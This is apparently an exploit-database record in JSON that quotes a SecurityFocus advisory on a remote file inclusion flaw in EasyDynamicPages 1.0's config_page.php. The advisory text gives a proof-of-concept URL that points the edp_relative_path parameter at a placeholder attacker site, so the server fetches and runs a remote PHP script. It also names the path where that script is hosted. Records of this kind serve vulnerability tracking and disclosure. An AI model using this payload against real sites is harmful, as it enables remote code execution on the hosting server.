{"lastseen": "2020-04-01T19:04:13", "references": [], "description": "\nEasyDynamicPages 1.0 - config_page.php PHP Remote File Inclusion", "edition": 1, "reporter": "tsbeginnervn", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2004-01-02T00:00:00", "title": "EasyDynamicPages 1.0 - config_page.php PHP Remote File Inclusion", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.4, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2004-01-02T00:00:00", "id": "EXPLOITPACK:EE934F5986F0A422755558E34982A59D", "href": "", "viewCount": 4, "sourceData": "source: https://www.securityfocus.com/bid/9338/info\n\nEasyDynamicPages is prone to a remote file include vulnerability in a configuration script. This will permit a remote attack to include malicious PHP scripts from remote servers, which will then be executed by the web server hosting the vulnerable software. \n\nhttp://www.example.com/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://[attacker's_site]/\n\nThe attacker must have a malicious script hosted at the following location:\n\nhttp://[attacker's_site]/admin/site_settings.php", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645436507, "score": 1659818015}, "_internal": {"score_hash": "1173411192a704e9fabd3653d703a6b4"}}